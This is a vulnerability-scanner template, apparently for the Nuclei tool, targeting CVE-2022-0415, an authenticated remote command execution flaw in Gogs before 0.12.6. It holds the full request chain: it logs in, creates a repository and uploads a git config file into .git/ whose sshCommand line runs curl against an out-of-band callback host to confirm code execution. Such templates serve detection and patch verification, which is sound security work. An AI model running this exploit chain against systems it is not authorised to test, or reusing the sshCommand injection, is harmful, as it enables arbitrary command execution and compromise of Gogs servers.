id: CVE-2022-0415 info: name: Gogs <0.12.6 - Remote Command Execution author: theamanrawat severity: high description: | Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: Fixed in version 0.12.6. reference: - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284 - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902 - https://nvd.nist.gov/vuln/detail/CVE-2022-0415 - https://github.com/bfengj/CTF - https://github.com/cokeBeer/go-cves classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0415 cwe-id: CWE-434,CWE-20 epss-score: 0.11758 epss-percentile: 0.95304 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: gogs product: gogs shodan-query: - cpe:"cpe:2.3:a:gogs:gogs" - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" google-query: intitle:"sign in - gogs" tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on - | POST /{{username}}/{{randstr}}/upload-file HTTP/1.1 Host: {{Hostname}} Accept: application/json X-Requested-With: XMLHttpRequest X-Csrf-Token: {{auth_csrf}} Content-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395 -----------------------------313811965223810628771946318395 Content-Disposition: form-data; name="file"; filename="config" Content-Type: application/octet-stream [core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = curl http://{{interactsh-url}} -I [remote "origin"] url = git@github.com:torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/master -----------------------------313811965223810628771946318395-- - | POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name= matchers-condition: and matchers: - type: word part: interactsh_protocol words: - dns - http - type: word part: body_1 words: - content="Gogs extractors: - type: regex name: csrf group: 1 regex: - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - name="_csrf" content="(.*)" internal: true - type: regex name: uuid group: 1 regex: - ' "uuid": "(.*)"' internal: true # digest: 4a0a0047304502200d8ef6d64f56736b9f4df649e0b8a901e1a6c156d7d926865321279d635f17e4022100e580aba4cadd6840a8ca15efa3aaf5afc09849320cafadf6eecbfa672db2cb58:922c64590222798bb761d5b6d8e72950